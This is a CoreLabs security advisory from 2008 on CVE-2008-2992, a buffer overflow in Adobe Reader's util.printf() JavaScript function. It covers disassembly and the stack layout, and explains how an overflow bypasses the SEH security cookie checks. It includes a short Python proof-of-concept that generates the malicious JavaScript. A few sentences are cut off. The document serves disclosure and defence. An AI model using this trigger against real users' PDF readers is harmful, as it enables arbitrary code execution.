Advisory ID: CORE-2008-0526
Advisory URL: <http://www.coresecurity.com/content/adobe-reader-buffer-overflow>
Date published: 2008-11-04
Date of last update: 2008-11-04
Vendors contacted: Adobe
Release mode: Coordinated release
Adobe Reader is arguably the world's most ubiquitous electronic document sharing application. The software can be used to view, search, digitally sign, verify, print, and collaborate on Adobe PDF files, and includes scripting functionality to allow for extended customization and extensibility.
Adobe will issue a security update that addresses the vulnerable version 8.1.2 of Reader.
The CVE-2008-2992 vulnerability was discovered by Damian Frizza from the CORE IMPACT Exploit Writers Team at Core Security Technologies while investigating the feasibility of exploiting a bug in Foxit Reader that had been disclosed in May 2008. The CVE-2008-1104 vulnerability was discovered in Foxit Reader by Dyon Balding from Secunia Research.
While investigating the feasibility of exploiting the vulnerability previously disclosed in Foxit Reader (CVE-2008-1104)  we found that Adobe Reader was affected by the same bug. After an initial examination of the involved implementation bug, it was believed that although present, the problem was apparently not exploitable in Adobe Reader due to the use of two structured exception handlers in the program. The primary difference between the Adobe and Foxit applications is the manner in which they perform security checks, and at first glance, it seemed as if the bug was not exploitable in Reader, since there was no way to control the program's first exception handler.
We now present the details of the vulnerability. The original Secunia advisory concerning Foxit Reader stated: "the vulnerability is caused due to a boundary error when parsing format strings containing a floating point specifier in the
var num = 1.2 util.printf("%5000f",num)
After a Proof of Concept PDF file was crafted, we tried to open it with Adobe Reader 8.1.2. The application closed without warning, without crash, simply closed.
By disassembling the DLL library Escript.api, we reached this code:
238AF9C5 PUSH EDI 238AF9C6 PUSH 20 238AF9C8 PUSH ESI 238AF9C9 CALL MSVCR80.memset
This is exactly the same bug, where EDI is the size to be copied, controlled by the attacker, and ESI is the destination, pointing to a buffer in the stack.
The program generates an exception here:
78144AFF REP STOS DWORD PTR ES:[EDI]
inside the code of the memset function, when trying to write in the section that comes after the stack.
We examined the active SEH (Structured Exception Handlers), and found that in this case (unlike the Foxit case), we have two SEH:
Address SE handler 0012EE70 EScript.238F6F95 0012F140 20202020
One has been completely overwritten by us, and the other not. The code of the first handler is:
238F6F95 MOV EDX,DWORD PTR SS:[ESP+8] 238F6F99 LEA EAX,DWORD PTR DS:[EDX+C] 238F6F9C MOV ECX,DWORD PTR DS:[EDX-58] 238F6F9F XOR ECX,EAX 238F6FA1 CALL EScript.23806D28 Security Cookie Check 1 238F6FA6 MOV ECX,DWORD PTR DS:[EDX+22C] 238F6FAC XOR ECX,EAX 238F6FAE CALL EScript.23806D28 Security Cookie Check 2 238F6FB3 MOV EAX,EScript.2391B54C 238F6FB8 JMP MSVCR80.__CxxFrameHandler3
When the exception is generated, this handler takes the control and is charged of checking two security cookies. One of them has been overwritten, so the execution jumps directly to ExitProcess.
Until now, the difference between the two bugs is only the cookies check. In Foxit we have the following structure on the stack:
Memset Buffer RET ... ... SEH ... ...
Whereas in Adobe Reader we basically have:
SEH1 --> Security Cookie Check ... Memset Buffer SecurityCookie RET ... SEH2 --> Overwritten with 0x20202020
At first sight, it seems that this bug in not exploitable, since there is no way to control the first handler. But... looking at the code, we found that before the vulnerable call to memset, another overflow occurs. As a first step, the program transforms the argument received by the function util.printf() to a String here:
238AF8D1 FSTP QWORD PTR SS:[ESP] 238AF8D4 CALL DWORD PTR DS:[MSVCR80._fcvt]
The function returns only the first 16 digits, and the rest is padded with "0" (0x30). This is copied to the stack here:
238AF946 MOV EAX,DWORD PTR SS:[EBP-28] 238AF949 MOV AL,BYTE PTR DS:[EAX+EDX] 238AF94C MOV BYTE PTR DS:[ESI+EDI],AL # copy to the stack 238AF94F INC EDI 238AF950 INC EDX 238AF951 CMP EDX,ECX
After this copy is completed, the stack has the following disposition:
Float To String Buffer ... ... SEH1 --> Overwritten with 0x30303030 ... ... Memset Buffer ... ... SEH2 --> Overwritten with 0x20202020 ... ...
If we call the vulnerable function with a long enough number, we can avoid the cookies check and jump to the address 0x30303030. By allocating memory somehow and copying our shellcode there, we can execute arbitrary code in the context of the application.
fill = 276 * '8' script=""" var num = 12999999999999999999_FILL_ util.printf("%45000f",num) """ script = script.replace('_FILL_', fill) print script
By embedding the generated script in a PDF file, we got an
Access violation when executing .
 Foxit Reader "util.printf()" Buffer Overflow (CVE-2008-1104) - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1104>
CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: <http://www.coresecurity.com/corelabs>.
Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at <http://www.coresecurity.com>.
The contents of this advisory are copyright (c) 2008 Core Security Technologies and (c) 2008 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given.
This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at /legacy/files/attachments/core_security_advisories.asc.